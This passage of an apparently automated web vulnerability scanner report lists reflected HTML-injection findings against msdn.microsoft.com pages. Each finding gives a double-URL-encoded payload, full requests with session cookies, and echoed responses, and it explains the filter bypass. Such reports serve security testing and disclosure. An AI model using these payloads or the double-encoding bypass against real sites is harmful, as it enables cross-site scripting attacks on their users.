P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:59 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya58b3"><a>a478026753a/dd582938(office.11)" />
...[SNIP]...

2.57. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fd90%2522%253e%253ca%253e989d6e38d2f was submitted in the REST URL parameter 3. This input was echoed as 5fd90"><a>989d6e38d2f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(office.11).aspx5fd90%2522%253e%253ca%253e989d6e38d2f HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:29 GMT
Content-Length: 9206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.11).aspx5fd90"><a>989d6e38d2f" />
...[SNIP]...

2.58. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75f6%2522%253e%253ca%253e1af47b0d7bc was submitted in the REST URL parameter 1. This input was echoed as d75f6"><a>1af47b0d7bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd75f6%2522%253e%253ca%253e1af47b0d7bc/library/dd582938(v/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd75f6"><a>1af47b0d7bc/library/dd582938(v/x3doffice.11" />
...[SNIP]...

2.59. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0137%2522%253e%253ca%253e0e5c27062dd was submitted in the REST URL parameter 2. This input was echoed as c0137"><a>0e5c27062dd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryc0137%2522%253e%253ca%253e0e5c27062dd/dd582938(v/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc0137"><a>0e5c27062dd/dd582938(v/x3doffice.11" />
...[SNIP]...

2.60. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68427%2522%253e%253ca%253ef797850a81e was submitted in the REST URL parameter 3. This input was echoed as 68427"><a>f797850a81e in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v68427%2522%253e%253ca%253ef797850a81e/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v68427"><a>f797850a81e/x3doffice.11" />
...[SNIP]...

2.61. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fe24%2522%253e%253ca%253edee8348ee07 was submitted in the REST URL parameter 4. This input was echoed as 5fe24"><a>dee8348ee07 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(v/x3doffice.115fe24%2522%253e%253ca%253edee8348ee07 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(v/x3doffice.115fe24"><a>dee8348ee07" />
...[SNIP]...

2.62. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bbc"><a>62955b61670 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-us/library/dd582938(v/x3doffice.11?92bbc"><a>62955b61670=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 